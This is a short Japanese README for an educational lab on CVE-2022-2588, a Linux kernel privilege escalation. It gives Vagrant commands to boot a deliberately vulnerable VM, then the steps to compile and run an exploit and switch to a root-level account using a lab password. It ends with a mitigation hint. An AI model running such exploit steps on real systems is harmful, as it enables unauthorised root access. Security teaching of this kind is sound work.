
コードは1つのCPU向けに適応されており、教育目的で脆弱なマシンを起動するためのVagrantファイルが提供されています。
脆弱なマシンを作成するには、マシンにVagrantをインストールしておく必要があります。その後、リポジトリのルートで次のコマンドを実行します。
Vagrant up
インストールと起動を待ち、その後:
Vagrant ssh
VM内部:
cd CVE-2022-2588/ && gcc ./exploit.c -o exploit -lpthread
./exploit
その後:
su ensimag
password: #ensimag
#
元のエクスプロイトコード: こちら
エクスプロイトを防止するには、15行目と18行目をコメント解除して、プロセスを再起動してみてください。